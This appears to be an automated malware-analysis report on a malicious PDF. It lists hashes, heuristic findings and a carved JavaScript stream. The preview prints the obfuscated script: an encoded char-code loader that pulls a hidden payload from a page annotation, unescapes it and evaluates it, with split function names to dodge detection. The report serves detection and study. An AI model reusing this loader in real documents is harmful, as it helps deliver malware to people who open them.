Malicious PDF — malware analysis report

Static analysis result for SHA-256 2d70071611c4afb5…

MALICIOUS

PDF

13.1 KB First seen: 2026-05-08
MD5: 4bc09d9723960dd8496b49cb2b1013cd SHA-1: ea246f0cc33c91c461b5c69d51d1c5081ae3df14 SHA-256: 2d70071611c4afb54c585bdf9d761c859e094bb4b9ab5e7f489f4050ef574734
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream is obfuscated, as suggested by the EXTRACTED_FILE_STATIC_TRIAGE heuristic and the presence of String.fromCharCode. This obfuscation is typical of malware attempting to hide its payload, which is likely a downloader for a second-stage exploit or malware. No specific family could be identified due to the obfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js pdf-javascript-stream PDF /JS object 5 at offset 0x107 1162 bytes
SHA-256: c09cce6ca3001aa4fc687e7595243eb0dc3da819ff999ce64900fd01e97532b8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "105,102,32,40,49,41,32,123,118,97,114,32,122,59,32,118,97,114,32,121,59,32,122,32,61,32,121,32,61,32,97,112,112,46,100,111,99,59,32,10,9,32,121,32,61,32,48,59,32,9,32,122,46,115,121,110,99,65,110,110,111,116,83,99,97,110,32,40,32,41,59,32,121,32,61,32,122,59,118,97,114,32,112,32,61,32,121,46,103,101,116,65,110,110,111,116,115,40,32,123,32,32,110,80,97,103,101,58,32,48,32,125,41,32,59,118,97,114,32,115,32,61,32,112,91,48,93,46,115,117,98,106,101,99,116,59,32,118,97,114,32,108,32,61,32,115,46,114,101,112,108,97,99,101,40,47,122,47,103,44,32,39,97,37,98,39,46,114,101,112,108,97,99,101,40,47,91,97,98,93,47,103,44,32,39,39,41,41,59,118,97,114,32,116,104,32,61,32,101,118,101,110,116,46,116,97,114,103,101,116,59,32,115,32,61,32,116,104,91,39,117,110,101,115,39,32,43,32,39,99,97,112,101,39,93,32,40,108,41,32,59,118,97,114,32,101,32,61,32,97,112,112,91,39,101,118,39,32,43,32,39,97,108,39,93,59,32,101,40,115,41,59,125"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }

Open this report in the interactive analyzer, or submit your own file for analysis.